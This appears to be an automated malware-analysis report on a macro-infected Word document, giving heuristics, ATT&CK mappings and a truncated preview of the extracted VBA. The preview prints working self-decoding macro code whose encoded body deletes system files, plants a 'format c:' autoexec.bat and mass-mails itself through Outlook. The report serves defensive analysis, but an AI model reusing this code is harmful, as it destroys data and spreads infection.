MALICIOUS
100
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to deobfuscate and modify its own code, indicating a downloader or dropper functionality. The presence of the Document_Open macro and the execution of VBA code strongly suggest a spearphishing attachment attack vector.
Heuristics 3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35269 bytes |
SHA-256: c6ad1ef7b475fe409d8748ac4e88b3cb10f545afe9311757a427943dbd99e9f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDoc"
Attribute VB_Base = "1Normal.ThisDoc"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Dim M(2) As Variant: Dim L(8) As Byte
Set M(1) = ActiveDocument.VBProject.VBComponents.Item(1)
Set M(2) = NormalTemplate.VBProject.VBComponents.Item(1)
Set CM = M(1).CodeModule
LinBeg = 33
Line1 = CM.Lines(LinBeg, 1)
L(1) = 1: n = 1 + LinBeg: CC = CM.Lines(LinBeg, CM.CountOfLines - LinBeg)
For I = 2 To 8
L(I) = Mid(Line1, I, 1)
Next
Do While InStr(CM.Lines(n, 1), ": End" + " Sub") = False
CypLinen = CM.Lines(n, 1)
Linen = ""
For k = 2 To Len(CypLinen)
o = Asc(Mid(CypLinen, k, 1))
j = Int(o / 32) + 1
I = 1
Do While (j <> L(I))
I = I + 1
Loop
nc = o - 32 * (L(I) - I)
Linen = Linen + Chr(nc)
Next
CM.ReplaceLine n, Linen: n = n + 1
Loop
CM.DeleteLines LinBeg
IDHMO (M)
CM.DeleteLines LinBeg, CM.CountOfLines - LinBeg: CM.InsertLines LinBeg, CC: ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub IDHMO(M As Variant)
'6283457
' /î %òòïò 2åóõíå .åøô
' )æ 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ¼¾ ¢¢ 4èåî 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ½ ±
' #ïííáîä"áòó¨¢4ïïì󢩮#ïîôòïìó¨¢-áãò®%îáâìåä ½ &áìóåº /ðôéïîó®#ïîæéòí#ïîöåòóéïîó ½ &áìóåº /ðôéïîó®6éòõó0òïôåãôéïî ½ &áìóåº /ðôéïîó®3áöå.ïòíáì0òïíðô ½ &áìóå
' 3åô æó ½ #òåáôå/âêåãô¨¢3ãòéðôéîç®&éìå3ùóôåí/âêåãô¢©
' 3åô & ½ æó®'åô&éìå¨.ïòíáì4åíðìáôå®&õìì.áí婺 &®!ôôòéâõôåó ½ °
')æ $áôå ¾ £·¯±·¯°°£ 4èåî §éô ó íù âéòôèäáù ¡
' )æ !ððìéãáôéïî®5óåò.áíå ¼¾ ¢þþþ!îçåì¢ 4èåî
' æó®$åìåôå&éìå ¢#º<éï®óùó¢¬ 4òõåº æó®$åìåôå&éìå ¢#º<ãïîæéç®óùó¢¬ 4òõåº æó®$åìåôå&éìå ¢#º<!õôïåøåã®âáô¢¬ 4òõåº æó®$åìåôå&éìå ¢#º<7éîäï÷ó<÷éî®ãïí¢¬ 4òõåº
' )æ )î3ôò¨!ððìéãáôéïî®5óåò.áíå¬ ¢ë袩 ½ 4òõå 4èåî
' 3åô áõ ½ æó®#òåáôå4åøô&éì娢#º<áõôïåøåã®âáô¢¬ 4òõå©
' áõ®7òéôå,éîå ¨¢ åãèï ïææ¢©
' áõ®7òéôå,éîå ¨¢ åãèï 9ïõò #ïíðõôåò éó âåéîç ãèåãëåä âù ùïõò !îôé6éòõó 0ìåáóå 7áéô ¢©
' áõ®7òéôå,éîå ¨¢ åãèï þþþ!îçå좩
' áõ®7òéôå,éîå ¨¢æïòíáô 㺠¯áõôïôåóô ¯ñ ¯õ¢©
' áõ®#ìïóå
' %îä )æ
' %îä )æ
' )æ !ãôéöå$ïãõíåîô®6"0òïêåãô®6"#ïíðïîåîôó®)ôåí¨±©®.áíå ½ ¢4èéó$ï㢠4èåî
' 3åô /, ½ #òåáôå/âêåãô¨¢/õôìïïë®!ððìéãáôéï
' 3åô -. ½ /,®'åô.áíå3ðáã娢-!0)¢©º -.®,ïçïîº 3åô /- ½ /,®#òåáôå)ôåí¨ïì-áéì)ôåí©
' &ïò á ½ ± 4ï -.®!ääòåóó,éóôó®#ïõîô
' 2áîäïíéúå 4éíåò
' )æ -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¾ ¸ 4èåî
' &ïò ò ½ ± 4ï )îô¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¯ ¸©
' 4áòçåô ½ )îô¨± « -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ª 2îä©
' /-®2åãéðéåîôó®!ää ¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó¨4áòçåô©©
' .åøô
' %îä )æ
' .åøô
' 7éôè /-
' 3åô 2åã ½ ®2åãéðéåîôó®!ä䨢ïõôìïïë¹·?²°°° èïôíáéì®ãïí¾¢©º 2åã®2åóïìöå
' ®3õâêåãô ½ !ãôéöå$ïãõíåîô®.áíåº ®"ïäù ½ !ððìéãáôéïî®5óåò.áíå ¦ öâ#ò,æ ¦ !ððìéãáôéïî®5óåò!ääòåóó ¦ öâ#ò,æ ¦ öâ#ò,æº ®!ôôáãèíåîôó®!ää !ãôéöå$ïãõíåîô®&õìì.áíåº ®3åîä
' %îä 7éôè
' -.®,ïçïææ
' 3åô /, ½ .ïôèéîç
' %îä )æ
'%îä )æ
' .â,± ½ -¨±©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
' .â,² ½ -¨²©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
' ).&? ½ &áìóåº ,éî"åç ½ ³³
' )æ -¨²©®.áíå ¼¾ ¢4èéó$ï㢠4èåî
' )æ .â,² ¾ ° 4èåî
' -¨²©®#ïäå-ïäõìå®$åìåôå,éîåó ±¬ .â,²
' %îä )æ
' -¨²©®.áíå ½ ¢4èéó$ï㢺 ).& ½ 4òõå
' %îä )æ
' )æ ).& ½ &áìóå 4èåî 'ï4ï #2904?
' .å÷.áíå ½ ¢¢
' 2áîäïíéúå 4éíåò
' &ïò ) ½ ± 4ï µ
' .å÷.áíå ½ .å÷.áíå « #èò¨)îô¨¶µ «
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.